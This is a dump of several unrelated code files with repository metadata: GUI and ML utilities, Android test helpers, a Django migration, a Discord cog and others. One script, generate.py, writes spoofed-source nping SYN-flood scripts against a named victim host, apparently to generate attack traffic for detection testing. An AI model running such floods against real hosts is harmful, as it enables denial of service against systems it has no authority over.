0
0
0.135714
140
7
50
20
0.876033
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.4
0
0.4
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
8237d91bd367fa37819ecabb2d7d852f0f4245f3
550
py
Python
aula075.py
juniorpedroso/CFBCursos
88657d6aad38de7d41e76499f0ff4d85a02745ae
[ "MIT" ]
null
null
null
aula075.py
juniorpedroso/CFBCursos
88657d6aad38de7d41e76499f0ff4d85a02745ae
[ "MIT" ]
null
null
null
aula075.py
juniorpedroso/CFBCursos
88657d6aad38de7d41e76499f0ff4d85a02745ae
[ "MIT" ]
null
null
null
# Lesson 75 - SpinBox
from tkinter import *

app = Tk()
app.title('Pedroso')
app.geometry('500x300')

def exibirValor():
    vvalor = sb_valores.get()
    l_valor.config(text=vvalor)

# sb_valores = Spinbox(app, from_=0, to=10)
# The values can be supplied as a range, as above,
# or as a tuple, as below
sb_valores = Spinbox(app, values=(2, 4, 6, 8, 10))
sb_valores.pack()

l_valor = Label(app, text='Valor')
l_valor.pack()

btn_exibeValor = Button(app, text='Exibe Valor', command=exibirValor)
btn_exibeValor.pack()

app.mainloop()
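For the range form the comment mentions, Spinbox also accepts an increment; a small sketch (not part of the lesson file) steps through similar even values:

from tkinter import Tk, Spinbox

root = Tk()
sb = Spinbox(root, from_=0, to=10, increment=2)  # 0, 2, 4, ..., 10
sb.pack()
root.mainloop()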
19.642857
69
0.705455
85
550
4.447059
0.6
0.095238
0.079365
0.100529
0
0
0
0
0
0
0
0.036403
0.150909
550
27
70
20.37037
0.773019
0.267273
0
0
0
0
0.075377
0
0
0
0
0
0
1
0.071429
false
0
0.071429
0
0.142857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
823a986d979638441ae38a1104614b823b72f2d7
3,922
py
Python
src/data/dataset_utils.py
GuillaumeBarree/challenge-ENS
50f1faa58be50a7c8cbd6078b4495679fd112c05
[ "MIT" ]
null
null
null
src/data/dataset_utils.py
GuillaumeBarree/challenge-ENS
50f1faa58be50a7c8cbd6078b4495679fd112c05
[ "MIT" ]
null
null
null
src/data/dataset_utils.py
GuillaumeBarree/challenge-ENS
50f1faa58be50a7c8cbd6078b4495679fd112c05
[ "MIT" ]
null
null
null
"""This file contains all functions related to the dataset.""" # pylint: disable=import-error import os import tqdm import numpy as np import pandas as pd from sklearn.model_selection import train_test_split from torch.utils.data import Dataset class RegressionDataset(Dataset): """Create a Torch Dataset for our regression problem.""" def __init__(self, x_data, y_data): self.x_data = x_data self.y_data = y_data def __getitem__(self, index): return self.x_data[index], self.y_data[index] def __len__(self): return len(self.y_data) def basic_random_split(path_to_train, valid_ratio=0.2): """This function split file according to a ratio to create training and validation. Args: path_to_train (str): path of the data root directory. valid_ratio (float): ratio of data for validation dataset. Returns: dict: Dictionary containing every data to create a Dataset. """ # Load the different files training_data = load_files(path_to_data=path_to_train) # Prepare features and targets features_and_targets = remove_useless_features(training_data=training_data) features_and_targets = create_x_and_y( input_data=features_and_targets, valid_ratio=valid_ratio ) return features_and_targets def load_test_data(path_to_test): """This function load test data Args: path_to_test (str): path of the data root directory. Returns: dict: Dictionary containing every data to create a Dataset. """ # Load the different files test_data = load_files(path_to_data=path_to_test) # Drop useless test_data["input"] = test_data["input"].drop(columns=["_ID"]) # Create a target test_data["target"] = np.ones((len(test_data["input"]))) feature_and_target = { "x_test": test_data["input"].to_numpy(), "y_test": np.ones((len(test_data["input"]))).ravel(), } return feature_and_target def load_files(path_to_data): """Load data input files. Args: path_to_data (str): path of the data root directory. Returns: list(pandas.core.frame.DataFrame): List of Dataframe containing data from each file. """ data = {} data_files = os.listdir(path_to_data) for datafile in tqdm.tqdm(data_files): if "input" in datafile: data["input"] = pd.read_csv( os.path.join(path_to_data, datafile), delimiter=",", decimal="." ) else: data["target"] = pd.read_csv( os.path.join(path_to_data, datafile), delimiter=",", decimal="." ) return data def remove_useless_features(training_data): """Create features and targets Args: training_data (list): List of Dataframe containing data from each file. Returns: dict : Dictionary containing features and target for each file. """ data_dict = {} for key, data in training_data.items(): features = data.drop(columns=["_ID"]) data_dict[key] = features return data_dict def create_x_and_y(input_data, valid_ratio): # pylint: disable=too-many-locals """Generate train, valid and test for each file and for each target. Args: input_data (dict): Features and targets for one file. valid_ratio (float): Test and validation ratio. Returns: dict: train, valid and test inputs and targets. """ feature_and_target = {} x_train, x_valid, y_train, y_valid = train_test_split( input_data["input"], input_data["target"], test_size=valid_ratio, random_state=0 ) y_train = y_train.values.ravel() y_valid = y_valid.values.ravel() feature_and_target = { "x_train": x_train.to_numpy(), "y_train": y_train, "x_valid": x_valid.to_numpy(), "y_valid": y_valid, } return feature_and_target
26.863014
92
0.661652
539
3,922
4.54731
0.207792
0.031824
0.02856
0.014688
0.28927
0.25459
0.20155
0.189718
0.106079
0.106079
0
0.001006
0.239419
3,922
145
93
27.048276
0.82065
0.343447
0
0.095238
0
0
0.044702
0
0
0
0
0
0
1
0.126984
false
0
0.095238
0.031746
0.349206
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
823c37e204f339ffbed684b109b1de9e326b50a2
65
py
Python
gemlog_from_rss/spip/__init__.py
Hookz/Gemlog-from-RSS
b57a311db3008e8b0df2442236c4729a06d9b74d
[ "MIT" ]
1
2021-02-19T16:06:07.000Z
2021-02-19T16:06:07.000Z
gemlog_from_rss/spip/__init__.py
Hookz/Gemlog-from-RSS
b57a311db3008e8b0df2442236c4729a06d9b74d
[ "MIT" ]
null
null
null
gemlog_from_rss/spip/__init__.py
Hookz/Gemlog-from-RSS
b57a311db3008e8b0df2442236c4729a06d9b74d
[ "MIT" ]
null
null
null
from .content import SinglePost from .page import Page, MainPage
21.666667
32
0.815385
9
65
5.888889
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.138462
65
2
33
32.5
0.946429
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
5
8240cdb3f22524daceb3ca1aaf3cf523bd2c0df4
12,619
py
Python
poseidon/ui/mobile/android/base_page.py
peterkang2001/Poseidon
cfafc01a1f69210dbfd95a0c62e06269eb599034
[ "Apache-2.0" ]
2
2019-12-27T09:14:38.000Z
2019-12-27T09:16:29.000Z
poseidon/ui/mobile/android/base_page.py
CodeMonkey4Fun/Poseidon
cfafc01a1f69210dbfd95a0c62e06269eb599034
[ "Apache-2.0" ]
2
2021-03-31T20:06:21.000Z
2021-12-13T20:48:16.000Z
poseidon/ui/mobile/android/base_page.py
peterkang2001/Poseidon
cfafc01a1f69210dbfd95a0c62e06269eb599034
[ "Apache-2.0" ]
1
2020-11-13T07:37:01.000Z
2020-11-13T07:37:01.000Z
# coding=utf-8 """ @author:songmengyun @file: base_page.py @time: 2020/01/03 """ import time import logging from selenium.webdriver.common.by import By from appium.webdriver.common.touch_action import TouchAction from selenium.webdriver.support.wait import WebDriverWait from appium.webdriver.mobilecommand import MobileCommand from appium.webdriver.connectiontype import ConnectionType from poseidon.ui.util.location import * from poseidon.base import CommonBase as cb from poseidon.ui.mobile.android.android_keycode import KEYCODE class Swipe: '''滚动屏幕相关''' def __init__(self, driver): self.driver = driver def swipe_up(self, width, height, n=5): '''定义向上滑动方法''' logging.info("定义向上滑动方法") x1 = width * 0.5 y1 = height * 0.9 y2 = height * 0.25 time.sleep(3) logging.info("滑动前") for i in range(n): logging.info("第%d次滑屏" % i) time.sleep(3) self.driver.swipe(x1, y1, x1, y2) def swipe_down(self, width, height, n=5): '''定义向下滑动方法''' logging.info("定义向下滑动方法") x1 = width * 0.5 y1 = height * 0.25 y2 = height * 0.9 time.sleep(3) logging.info("滑动前") for i in range(n): logging.info("第%d次滑屏" % i) time.sleep(3) self.driver.swipe(x1, y1, x1, y2) def swipe_left(self, width, height, n=5): '''定义向左滑动方法''' logging.info("定义向左滑动方法") x1 = width * 0.8 x2 = width * 0.2 y1 = height * 0.5 time.sleep(3) logging.info("滑动前") for i in range(n): logging.info("第%d次滑屏" % i) time.sleep(3) self.driver.swipe(x1, y1, x2, y1) def swipe_right(self, width, height, n=5): '''定义向右滑动方法''' logging.info("定义向右滑动方法") x1 = width * 0.2 x2 = width * 0.8 y1 = height * 0.5 time.sleep(3) logging.info("滑动前") for i in range(n): logging.info("第%d次滑屏" % i) time.sleep(3) self.driver.swipe(x1, y1, x2, y1) class Action: '''操作手机通知栏/获取元素''' def __init__(self, driver): self.driver = driver self.action = TouchAction(self.driver) def get_element(self, locator): """ 通过传入的locator获取selenium webelement对象 :param locator: :return: """ locator_type = locator[0] element = None if locator_type == By.ID: element = findId(self.driver, locator[1]) logging.debug("使用 id 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.XPATH: element = findXpath(self.driver, locator[1]) logging.debug("使用 xpath 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.LINK_TEXT: element = findLinkText(self.driver, locator[1]) logging.debug("使用 link text 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.PARTIAL_LINK_TEXT: element = findPLinkText(self.driver, locator[1]) logging.debug("使用 partial link text 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.NAME: element = findName(self.driver, locator[1]) logging.debug("使用 name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.TAG_NAME: element = findTagName(self.driver, locator[1]) logging.debug("使用 tag name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.CLASS_NAME: element = findClassName(self.driver, locator[1]) logging.debug("使用 class name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.CSS_SELECTOR: element = findCss(self.driver, locator[1]) logging.debug("使用 css selector 定位元素 ==> {0}".format(locator[1])) else: logging.error("错误的locator_type,请确认") return element def get_elements(self, locator): """ 通过传入的locator获取selenium webelements对象 :param locator: :return: """ locator_type = locator[0] elements = None if locator_type == By.ID: elements = findsId(self.driver, locator[1]) logging.debug("使用 id 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.XPATH: elements = findsXpath(self.driver, locator[1]) logging.debug("使用 xpath 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.LINK_TEXT: 
elements = findsLinkText(self.driver, locator[1]) logging.debug("使用 link text 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.PARTIAL_LINK_TEXT: elements = findsPLinkText(self.driver, locator[1]) logging.debug("使用 partial link text 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.NAME: elements = findsName(self.driver, locator[1]) logging.debug("使用 name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.TAG_NAME: elements = findsTagName(self.driver, locator[1]) logging.debug("使用 tag name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.CLASS_NAME: elements = findsClassName(self.driver, locator[1]) logging.debug("使用 class name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.CSS_SELECTOR: elements = findsCss(self.driver, locator[1]) logging.debug("使用 css selector 定位元素 ==> {0}".format(locator[1])) else: logging.error("错误的locator_type,请确认") return elements def set_touch_pwd(self, locator): ''' 设置手势解锁 :param locator: 获取第一个触摸点的坐标location及size :return: ''' start = self.get_element(locator) start_height = start.size['height'] # start_width = start.size['width'] start_x = start.location['x'] start_y = start.location['y'] begin_x = start_x + start_width / 2 begin_y = start_y + start_height / 2 action = TouchAction(self.driver) action.press(x=start_x, y=start_y).wait(100).move_to(x=start_x + start_width * 2, y=begin_y).wait(100).\ move_to(x=start_x + start_width * 2, y=start_y + start_height * 2).wait(100).\ move_to(x=begin_x, y=start_y + start_height * 2).release().perform() def adjust_volume(self, size): '''调节系统音量,变大或变小''' def adjust_brightness(self, size): '''调节屏幕亮度,变大或变小''' def clean_notification_bar_message(self): '''清空通知栏消息''' self.driver.open_notifications() # 打开下拉通知栏 def open_close_wifi(self): '''打开/关闭Wi-Fi''' def airplane_mode(self): '''打开飞行模式''' class KeyEvent: '''按键事件''' def __init__(self, driver): self.driver = driver def volume(self, size:int) -> None: '''按键系统音量变大或变小''' if size >=0: for i in range(0, size): self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_UP) # 音量大键 else: for i in range(size, 0): self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_DOWN) # 音量小键 self.driver.press_keycode(KEYCODE.KEYCODE_BACK) # 返回键 class AssertBase: '''断言相关''' def __init__(self, driver): self.driver = driver @cb.com_try_catch def check_current_activity(self, app_activity): '''验证当前activity是否登录传入app_activity''' current_activity = self.driver.current_activity if current_activity: cb.checkEqual(current_activity, app_activity) else: logging.error('当前没有app_activity') class BasePage(Swipe, Action, KeyEvent, AssertBase): '''其他通过方法''' def __init__(self, driver): self.driver = driver super().__init__(driver=self.driver) @cb.com_try_catch def install_app(self, app_path:str, app_package:str): ''' :param app_path: 安装包路径 :param app_package: 安装包包名 :return: 先判断是否安装: 如果未安装,则执行安装 ''' if self.driver.is_app_installed(app_package): logging.info(f'{app_package}已安装') else: self.driver.install_app(app_path) logging.info(f'{app_package}安装成功') @cb.com_try_catch def uninstall_app(self, app_package:str): ''' :param app_package: 安装包包名 :return: 先判断是否安装: 如果已安装,执行卸载 ''' if self.driver.is_app_installed(app_package): self.driver.remove_app(app_package) logging.info(f'{app_package}卸载成功') else: logging.info(f'{app_package}已卸载') @cb.com_try_catch def open_app(self, app_package:str, app_activity:str) -> None: ''' :param app_package: 需要打开的应用名 :param app_activity: 需要打开的界面 :return: 在当前应用中打开一个activity或者启动一个新应用并打开一个 activity ''' logging.info(f'当前activity: {self.driver.current_activity}') 
self.driver.start_activity(app_package, app_activity) logging.info(f'当前activity: {self.driver.current_activity}') def app_strings(self): '''返回应用程序的字符串''' string = self.driver.app_strings(language='en') return string @cb.com_try_catch def get_app_package_info(self): """ :return: 输出短信程序包名和界面名 """ return [self.driver.current_package, self.driver.current_activity] @cb.com_try_catch def get_window_info(self): '''获取屏幕宽度和高度''' size = self.driver.get_window_size() width = size['width'] height = size['height'] return [width, height] def lock_app(self): '''锁定屏幕''' self.driver.lock(5) def hide_keyboard(self): '''收起键盘''' self.driver.hide_keyboard() def shake_app(self): '''模拟设备摇晃''' self.driver.shake() def current_content(self): '''进入指定上下文''' current_content = self.driver.current_context # 列出当前上下文 current_contents = self.driver.contents # 列出所有的可用上下文 return current_content @cb.com_try_catch def backgroup_app(self, seconds:int, restart=True): '''backgroup app seconds''' if restart == True: self.driver.background_app(seconds) else: pass @cb.com_try_catch def wait(self, fun, timeout=10, fre=1): ''' :param : 显示等待 :return: ''' wait = WebDriverWait(self.driver, timeout, fre) wait.until(fun) @cb.com_try_catch def click_element(self, locator, is_button=True): """ 点击 :param locator: :param is_button: :return: """ element = self.get_element(locator) if is_button: element.click() else: element = self.get_element(locator) TouchAction(self.driver).tap(element).perform() @cb.com_try_catch def set_text(self, locator, values): """ 为输入框 输入字符内容 :param locator: :param values: :return: """ text_field = self.get_element(locator) text_field.clear() text_field.send_keys(values) def clean_app_cash(self,app_package): '''清除app缓存''' def is_displayed(self, locator, mark=True): """ 判断某个元素是否存在 :param locator: :return: """ element = self.get_element(locator) if mark: self.hight_light(element) return element.is_displayed() def hight_light(self, element, times=2, seconds=2, color="red", border=2): """ 传入selenium webelement对象如果能找到就高亮显示 :param element: :param times: :param seconds: :return: """ js = "element = arguments[0]; " \ "original_style = element.getAttribute('style'); " \ "element.setAttribute('style', original_style + \";" \ "border: %spx solid %s;\");" \ "setTimeout(function(){element.setAttribute('style', original_style);}, 1000);" %(border,color) try: for i in range(0, times): self.driver.execute_script(js, element) except Exception as e: logging.error(e) def switch_h5_app(self, context): self.driver.execute(MobileCommand.SWITCH_TO_CONTEXT, {"name": context}) def find_item(self, el): '''验证页面元素是否存在''' logging.info(f'验证页面元素:{el} 是否存在') source = self.driver.page_source if el in source: return True else: return False
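In the record above, set_touch_pwd reads start.size['height'] but leaves the start_width line commented out, then uses start_width anyway — a NameError at call time; its docstrings and log messages are also in Chinese. A hedged drop-in replacement for Action.set_touch_pwd (assumes the surrounding class: self.driver and self.get_element), with the comments translated:

from appium.webdriver.common.touch_action import TouchAction

def set_touch_pwd(self, locator):
    """Draw a gesture-unlock pattern starting from the element at `locator`."""
    start = self.get_element(locator)
    start_height = start.size['height']
    start_width = start.size['width']      # was commented out, causing a NameError below
    start_x = start.location['x']
    start_y = start.location['y']
    begin_x = start_x + start_width / 2
    begin_y = start_y + start_height / 2
    action = TouchAction(self.driver)
    (action.press(x=start_x, y=start_y).wait(100)
           .move_to(x=start_x + start_width * 2, y=begin_y).wait(100)
           .move_to(x=start_x + start_width * 2, y=start_y + start_height * 2).wait(100)
           .move_to(x=begin_x, y=start_y + start_height * 2)
           .release().perform())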
29.902844
113
0.576908
1,479
12,619
4.770791
0.198107
0.085034
0.029478
0.040816
0.452664
0.3947
0.353033
0.293651
0.273243
0.257653
0
0.017684
0.296458
12,619
421
114
29.973872
0.777089
0.083842
0
0.393701
0
0
0.085046
0.015529
0
0
0
0
0.007874
1
0.149606
false
0.003937
0.03937
0
0.244094
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8240d9157af0d451e4630f0ef6ada12168952405
1,957
py
Python
tests/test_models/test_task_error.py
wikimedia/analytics-wikimetrics
1d2036657b06ccd16ecfc76edd3f9a6119ff75f4
[ "MIT" ]
6
2015-01-28T05:59:08.000Z
2018-01-09T07:48:57.000Z
tests/test_models/test_task_error.py
wikimedia/analytics-wikimetrics
1d2036657b06ccd16ecfc76edd3f9a6119ff75f4
[ "MIT" ]
2
2020-05-09T16:36:43.000Z
2020-05-09T16:52:35.000Z
tests/test_models/test_task_error.py
wikimedia/analytics-wikimetrics
1d2036657b06ccd16ecfc76edd3f9a6119ff75f4
[ "MIT" ]
1
2016-01-13T07:19:44.000Z
2016-01-13T07:19:44.000Z
import celery
from nose.tools import assert_equal, assert_true
from datetime import datetime
from wikimetrics.models import TaskErrorStore, ReportStore
from ..fixtures import DatabaseTest


class TaskErrorStoreTest(DatabaseTest):

    def setUp(self):
        DatabaseTest.setUp(self)
        self.report = ReportStore(status=celery.states.PENDING)
        self.session.add(self.report)
        self.session.commit()

    def test_add_new(self):
        # If the failing report has no previous errors,
        # a new task error should be created.
        t1 = datetime.now().replace(microsecond=0)
        TaskErrorStore.add('report', self.report.id, 'message', 'traceback')
        t2 = datetime.now().replace(microsecond=0)
        row = self.session.query(TaskErrorStore).first()
        assert_equal(row.task_type, 'report')
        assert_equal(row.task_id, self.report.id)
        assert_true(row.timestamp >= t1 and row.timestamp <= t2)
        assert_equal(row.message, 'message')
        assert_equal(row.traceback, 'traceback')
        assert_equal(row.count, 1)

    def test_add_existing(self):
        # If the failing report has previous errors,
        # the existing task error should be updated.
        t1 = datetime.now()
        te = TaskErrorStore(task_type='report', task_id=self.report.id,
                            count=1, timestamp=t1, message='message',
                            traceback='traceback')
        self.session.add(te)
        self.session.commit()
        TaskErrorStore.add('report', self.report.id, 'message2', 'traceback2')
        t2 = datetime.now()
        row = self.session.query(TaskErrorStore).first()
        print(t1, row.timestamp, t2)  # print function (was a Python 2 print statement)
        assert_equal(row.task_type, 'report')
        assert_equal(row.task_id, self.report.id)
        assert_true(row.timestamp > t1 and row.timestamp < t2)
        assert_equal(row.message, 'message2')
        assert_equal(row.traceback, 'traceback2')
        assert_equal(row.count, 2)
39.938776
83
0.66326
239
1,957
5.330544
0.276151
0.094976
0.10989
0.056515
0.417582
0.356358
0.191523
0.191523
0.191523
0.191523
0
0.01321
0.226367
1,957
48
84
40.770833
0.828269
0.085335
0
0.210526
0
0
0.063866
0
0
0
0
0
0.342105
0
null
null
0
0.131579
null
null
0.026316
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
82416465e002cce6e0e1cf4af62bd2ddea23d8ff
545
py
Python
apps/puzzles/migrations/0004_metapuzzle_description.py
madjaqk/puzzle_master_v2
e50b0f02abbf32aebe9583152bd9a5b43f5da7d7
[ "MIT" ]
null
null
null
apps/puzzles/migrations/0004_metapuzzle_description.py
madjaqk/puzzle_master_v2
e50b0f02abbf32aebe9583152bd9a5b43f5da7d7
[ "MIT" ]
8
2020-02-07T04:11:07.000Z
2022-02-10T07:04:57.000Z
apps/puzzles/migrations/0004_metapuzzle_description.py
madjaqk/puzzle_master_v2
e50b0f02abbf32aebe9583152bd9a5b43f5da7d7
[ "MIT" ]
null
null
null
# Generated by Django 2.0 on 2017-12-20 04:27 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('puzzles', '0003_auto_20171219_2002'), ] operations = [ migrations.AddField( model_name='metapuzzle', name='description', field=models.TextField(default='What technology should I use to build my spoooooky website? Originally written for Coding Dojo students in October 2017.'), preserve_default=False, ), ]
27.25
168
0.647706
61
545
5.704918
0.868852
0
0
0
0
0
0
0
0
0
0
0.084577
0.262385
545
19
169
28.684211
0.781095
0.078899
0
0
1
0.076923
0.344
0.046
0
0
0
0
0
1
0
false
0
0.076923
0
0.307692
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
8243b500985cbd67fd910c97e1596597cb663eae
958
py
Python
cogs/testing.py
classerase/Stand-Arrow
89183c266913af889dabb68f4d0c39153875f7da
[ "MIT" ]
2
2020-06-03T20:48:09.000Z
2020-06-04T04:29:06.000Z
cogs/testing.py
BrianDehlinger/Stand-Arrow
150cb741c73a244a88ce1cbcb21c71753848bbc6
[ "MIT" ]
2
2020-06-15T18:28:17.000Z
2020-06-17T20:44:43.000Z
cogs/testing.py
BrianDehlinger/Stand-Arrow
150cb741c73a244a88ce1cbcb21c71753848bbc6
[ "MIT" ]
1
2020-06-03T20:48:07.000Z
2020-06-03T20:48:07.000Z
from discord.ext import commands


class Testing(commands.Cog):
    def __init__(self, bot):
        self.bot = bot

    @commands.command()
    async def who(self, ctx):
        author = ctx.author
        await ctx.send(f"Hello {author}")

    @commands.command()
    async def debug_free_cash(self, ctx):
        author = ctx.author
        if str(ctx.author) != "TestUser#0001":
            # Send the message before raising; the raise made this send unreachable.
            await ctx.send("You are not authorized to do that")
            raise ValueError("Unauthorized API usage")
        else:
            await ctx.insert_into_inventory(author, "money", 1000)
            await ctx.send("You have been given $1000!")

    @commands.command()
    async def debug_clear(self, ctx):
        author = ctx.author
        if str(ctx.author) != "TestUser#0001":
            await ctx.send("You are not authorized to do that!")
            raise ValueError("Unauthorized API usage")
        else:
            await ctx.clear_inventory(author)
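discord.py also ships a decorator for exactly this pattern; a hedged alternative that moves the authorization into commands.check (the hard-coded user string comes from the record, the cog name is illustrative):

from discord.ext import commands

def is_test_user():
    # Failing the check raises commands.CheckFailure instead of an inline ValueError.
    def predicate(ctx):
        return str(ctx.author) == "TestUser#0001"
    return commands.check(predicate)

class CheckedTesting(commands.Cog):
    @commands.command()
    @is_test_user()
    async def debug_clear(self, ctx):
        await ctx.clear_inventory(ctx.author)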
30.903226
66
0.605428
120
958
4.75
0.416667
0.126316
0.084211
0.121053
0.607018
0.470175
0.470175
0.470175
0.470175
0.470175
0
0.023392
0.286013
958
30
67
31.933333
0.809942
0
0
0.48
0
0
0.189979
0
0
0
0
0
0
1
0.04
false
0
0.04
0
0.12
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8244b7448ffcff5ecfd5351a2381a04f5d6caaae
2,577
py
Python
docker/d-streamon-master/d-streamon/streamon/scripts/attacks/generate.py
ferrarimarco/open-scissor
d54718a1969701798f3e2d57f3db68d829da1cc0
[ "Apache-2.0" ]
2
2017-12-02T10:38:05.000Z
2018-04-22T17:15:01.000Z
docker/d-streamon-master/d-streamon/streamon/scripts/attacks/generate.py
scissor-project/open-scissor
d54718a1969701798f3e2d57f3db68d829da1cc0
[ "Apache-2.0" ]
67
2017-11-11T15:22:34.000Z
2018-04-24T06:44:59.000Z
docker/d-streamon-master/d-streamon/streamon/scripts/attacks/generate.py
ferrarimarco/open-scissor
d54718a1969701798f3e2d57f3db68d829da1cc0
[ "Apache-2.0" ]
1
2017-12-07T08:18:49.000Z
2017-12-07T08:18:49.000Z
import random def generateRandomIndex(inputlist): '''(list of str)->str''' return random.choice(inputlist) def readHostFile(fileToPen): '''(str)->list of str''' lines=open(fileToPen,'r') line=lines.readlines() listOfHost=[] for i in line: listOfHost.append(i.strip()) s = set(listOfHost) return list(s) def generateBads(hostsFile, victim): output = open('attack_'+victim+'.sh', 'w') output.write("#!/bin/bash\n\n") hostsList=readHostFile(hostsFile) for hs in hostsList: scriptLine= 'nping --tcp -S ' + hs + ' -p 80 --flags syn ' + victim + ' -c 500 --delay 20ms &\n' output.write(scriptLine) output.close() def generateScripts(server,host): serversList=readHostFile(server) hostsList=readHostFile(host) random.shuffle(serversList) serversList = serversList[:7] uniqueList = set(serversList) uniqueList.add('93.184.220.20') uniqueList.add('65.54.189.53') uniqueList.add('82.199.80.141') serversList = list(uniqueList) goodsTraffic = [] for hs in hostsList: # sname = hs.split('.')[-1] + ".sh" # starter.write( "./{0} &\n".format(sname) ) # output = open(sname, 'w') # output.write("#!/bin/bash\n") # output.write("sleep " + str(random.uniform(0.5, 1)) + "\n" ) # generate random traffic for a given host for i in range(30): serverName = generateRandomIndex(serversList) scriptLine= 'nping --tcp -S ' + hs + ' -p 80 --flags syn ' + serverName + ' -c 1\n' goodsTraffic.append(scriptLine) #output.write(scriptLine) #output.write("sleep 1\n") #output.close() starter = open('start_goods.sh', 'w') starter.write("#!/bin/bash\n\n") random.shuffle(goodsTraffic) trafficQty = len(goodsTraffic) numberOfScripts = 10 avgTrafficPerScript = trafficQty/numberOfScripts for i in range(numberOfScripts): sname = str(i)+'.sh' command = './{0} &\n'.format(sname) starter.write(command) output = open(sname, 'w') output.write("#!/bin/bash\n\n") begin = i*avgTrafficPerScript end = begin + avgTrafficPerScript lines = goodsTraffic[begin:end] output.writelines(lines) output.close() #lines = "\n".join(goodsTraffic) #starter.write(lines) starter.close() #run generateScripts('input.txt','hosts.txt') #generateBads('bad_hosts.txt', 'it.fxfeeds.mozilla.com')
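Under Python 3, trafficQty/numberOfScripts in generateScripts yields a float, so goodsTraffic[begin:end] would raise a TypeError; a hedged fix for the chunking step uses floor division (all names taken from the record):

# Floor division keeps slice bounds integral under Python 3 (true division
# returns a float, and goodsTraffic[begin:end] would raise TypeError).
avgTrafficPerScript = trafficQty // numberOfScripts

for i in range(numberOfScripts):
    begin = i * avgTrafficPerScript
    # Give the last script any remainder so no traffic lines are dropped.
    end = begin + avgTrafficPerScript if i < numberOfScripts - 1 else trafficQty
    lines = goodsTraffic[begin:end]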
21.297521
104
0.593326
289
2,577
5.280277
0.370242
0.050459
0.031455
0.034076
0.111402
0.102228
0.102228
0.087811
0.087811
0
0
0.02648
0.252619
2,577
120
105
21.475
0.765836
0.157548
0
0.111111
1
0
0.113906
0
0
0
0
0
0
0
null
null
0
0.018519
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
824559f16f34aa0ee165bce06fd9bf7a0fa99749
73
py
Python
src/base/__init__.py
Gloryness/tassomai-automation
2deef60f6b1a7640afe8c78937f1fd0088e6051c
[ "MIT" ]
34
2020-09-20T12:02:00.000Z
2022-03-22T01:46:28.000Z
src/base/__init__.py
Gloryness/tassomai-automation
2deef60f6b1a7640afe8c78937f1fd0088e6051c
[ "MIT" ]
65
2020-11-11T17:04:15.000Z
2022-03-25T15:41:15.000Z
src/base/__init__.py
Gloryness/tassomai-automation
2deef60f6b1a7640afe8c78937f1fd0088e6051c
[ "MIT" ]
13
2020-11-08T11:26:53.000Z
2022-03-22T01:46:29.000Z
__title__ = 'base' __author__ = 'Gloryness' __license__ = 'MIT License'
14.6
27
0.726027
7
73
5.857143
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.150685
73
4
28
18.25
0.66129
0
0
0
0
0
0.333333
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
8245c0a9780a132093308307ffdd47c661336825
20,282
py
Python
study_analyzer.py
CogStack/SemEHR-kconnect
8cfd48e358294e588575e24ccbb566f4f508b5d5
[ "Apache-2.0" ]
64
2018-04-23T02:59:45.000Z
2022-03-28T22:48:38.000Z
study_analyzer.py
CogStack/SemEHR-kconnect
8cfd48e358294e588575e24ccbb566f4f508b5d5
[ "Apache-2.0" ]
2
2018-07-16T10:33:38.000Z
2019-02-22T16:22:17.000Z
study_analyzer.py
CogStack/SemEHR-kconnect
8cfd48e358294e588575e24ccbb566f4f508b5d5
[ "Apache-2.0" ]
17
2018-06-05T17:36:55.000Z
2022-03-09T04:04:11.000Z
import ontotextapi as onto
import utils
import json
from os.path import isfile, join, split
import joblib as jl
import cohortanalysis as cohort
from ann_post_rules import AnnRuleExecutor
import sys
import xml.etree.ElementTree as ET
import concept_mapping
import urllib3
import logging


class StudyConcept(object):
